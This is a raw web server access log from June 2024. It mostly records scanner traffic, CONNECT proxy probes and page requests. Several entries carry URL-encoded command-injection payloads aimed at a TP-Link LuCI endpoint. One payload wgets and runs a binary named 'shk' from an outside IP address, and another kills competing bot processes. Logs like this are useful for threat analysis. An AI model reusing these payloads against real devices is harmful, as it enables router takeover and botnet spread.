119.237.202.53 - - [24/Jun/2024:21:39:02 +0200] "-" 400 1930 119.237.202.53 - - [24/Jun/2024:21:39:03 +0200] "-" 400 1930 119.237.202.53 - - [24/Jun/2024:21:39:03 +0200] "-" 400 1930 119.237.202.53 - - [24/Jun/2024:21:39:04 +0200] "-" 400 1930 119.237.202.53 - - [24/Jun/2024:21:39:04 +0200] "CONNECT one.one.one.one:80 HTTP/1.1" 400 804 119.237.202.53 - - [24/Jun/2024:21:39:05 +0200] "CONNECT one.one.one.one:80 HTTP/1.1" 400 804 119.237.202.53 - - [24/Jun/2024:21:39:06 +0200] "CONNECT one.one.one.one:80 HTTP/1.1" 400 804 87.121.69.27 - - [24/Jun/2024:21:39:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [24/Jun/2024:21:52:31 +0200] "GET / HTTP/1.1" 200 1895 94.156.8.70 - - [24/Jun/2024:22:03:52 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 141.98.83.197 - - [24/Jun/2024:22:21:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 141.98.83.197 - - [24/Jun/2024:22:21:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 205.210.31.52 - - [24/Jun/2024:22:39:51 +0200] "GET / HTTP/1.1" 200 1895 206.217.128.98 - - [24/Jun/2024:22:52:52 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.200 - - [24/Jun/2024:22:56:20 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 206.168.32.99 - - [24/Jun/2024:22:56:35 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [24/Jun/2024:22:56:38 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [24/Jun/2024:22:56:39 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [24/Jun/2024:23:31:36 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [24/Jun/2024:23:53:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [24/Jun/2024:23:53:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.244.36.206 - - [24/Jun/2024:23:59:28 +0200] "GET / HTTP/1.1" 200 1895